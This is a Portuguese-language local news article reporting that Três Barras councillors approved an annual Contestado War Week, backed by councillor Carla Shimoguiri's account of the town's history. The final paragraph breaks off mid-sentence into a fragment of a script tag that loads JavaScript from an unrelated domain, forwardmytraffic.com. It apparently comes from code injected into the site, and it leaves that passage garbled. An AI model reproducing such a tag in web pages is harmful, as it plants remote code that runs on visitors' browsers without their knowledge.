InícioDestaqueVereadores instituem a Semana do Contestado no município de Três Barras

Vereadores instituem a Semana do Contestado no município de Três Barras

Últimas notícias

A Trajetória de Antônio Viliczinski e a Origem do 3ºBPM

Dando continuidade à série de entrevistas com veteranos do...

Saúde intensifica campanha e alerta sobre sintomas de arboviroses

Com mais de 93 mil casos prováveis de dengue,...

Polícia Militar derruba ponto de tráfico em Três Barras

Após diversas denúncias anônimas via 190 sobre atividades de...

Ela será celebrada entre 20 e 27 de Outubro.

 

E foi aprovada a criação da Semana do Contestado no município de Três Barras. De autoria da vereadora Carla Shimoguiri (PTB), o texto recebeu parecer favorável de todos os edis presentes na sessão da última segunda-feira, 09. Com isso a Guerra do Contestado, sua história e desdobramentos serão relembrados entre 20 e 27 de Outubro, todos os anos. O projeto segue para sanção ou veto do executivo.

 

De acordo com a redação, a Semana do Contestado poderá ter realização do Poder Legislativo Municipal conferências, palestras, sessões cívicas e comemorativas, exposições e outras atividades culturais, tendo como co-participante a Secretaria Municipal de Educação, que estenderá tais ações à Rede Municipal de Ensino.

 

Na defesa do projeto, a vereadora relatou a história de Três Barras, diretamente ligada ao conflito, citando que a Southern Brazil Lumber and Colonization Company, que esteve instalada no município, é considerada como um dos fatores desencadeadores da Guerra, destacada em inúmeras pesquisas. Atualmente, parte do que resta do seu patrimônio está edificado na área do Campo de Instrução Marechal Hermes – CIMH.

 

Além disso, no texto, a vereadora citou a disputa pelo município, que em determinado momento era paranaense, e momentos depois, catarinense. Carla também destacou o Museu Municipal e a formação sócio-histórica da região para fundamentar a necessidade do registro e assim salvaguardar a história local.

 

Na tribuna Carla defendeu a aprovação afirmando que “esse projeto vai resgatar a história do município, que já é ilustrada em nosso museu que recebe visitas de diversos alunos do ensino médio e também das universidades”, interessados em conhecer o conflito que foi um dos mais violentos dos registros brasileiros.

 

Ao destacar que o próprio estado de Santa Catarina e outros municípios já instituíram a Semana do Contestado, disse que “Três Barras também merece ter essa lembrança”, citando que pesquisas on-line podem ajudar a entender o conflito, como um vídeo produzido por alunos da EEB Colombo Machado Salles, disponível no Youtube, ou no blog da autora tresbarrense Soeli Regina Lima…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.